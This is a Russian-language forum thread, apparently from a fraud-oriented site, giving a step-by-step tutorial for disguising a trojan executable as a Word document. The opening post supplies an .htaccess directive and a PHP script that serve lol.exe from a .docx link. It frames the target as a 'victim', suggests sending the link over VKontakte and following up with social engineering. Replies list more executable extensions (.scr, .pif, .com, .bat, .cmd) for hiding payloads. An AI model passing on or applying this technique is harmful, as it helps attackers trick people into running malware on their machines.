1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Подмена расширений на уровне сервера или впариваем троян

Тема в разделе "Чужие", создана пользователем Goblin0123, 13 сен 2013.

  1. TopicStarter Overlay
    Goblin0123

    Goblin0123

    Регистрация:
    29 апр 2013
    Сообщения:
    47
    Симпатии:
    12
    Доброго дня/вечера/ночи.
    Сегодня мы поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.
    Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.

    Ну что же, давайте приступим.

    1. Открываем блокнот, туда пишем:



    AddType application/x-httpd-php .doc .docx


    Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.
    2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:


    <?
    header(‘Content-Type: application/octet-stream’);
    header(‘Content-Disposition: attachment; filename=имя файла’);
    echo file_get_contents(‘путь к файлу’);
    ?>


    Пример:
    <?
    header(‘Content-Type: application/octet-stream’);
    header(‘Content-Disposition: attachment; filename=lol.exe‘);
    echo file_get_contents(‘Please login or register to view links‘);
    ?>
    Если же вы заливаете в корень, то можно написать последнюю строчку и так:
    echo file_get_contents(‘lol.exe‘);
    Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
    Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
    Теперь даем жертве ссылку: Please login or register to view links, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
    Спасибо за внимание!
    Статья написана для сайта openssource.biz Идею по данному способу подкинул человек под ником JSman.
     
    • Like Like x 5
    Метки:
  2. Apple96

    Apple96

    Регистрация:
    13 апр 2013
    Сообщения:
    416
    Симпатии:
    667
    Можно еще поставить расширение .pif или .com
     
  3. m0nk

    m0nk

    Регистрация:
    5 сен 2013
    Сообщения:
    295
    Симпатии:
    118
    + .bat , .cmd
     

Поделиться этой страницей

Загрузка...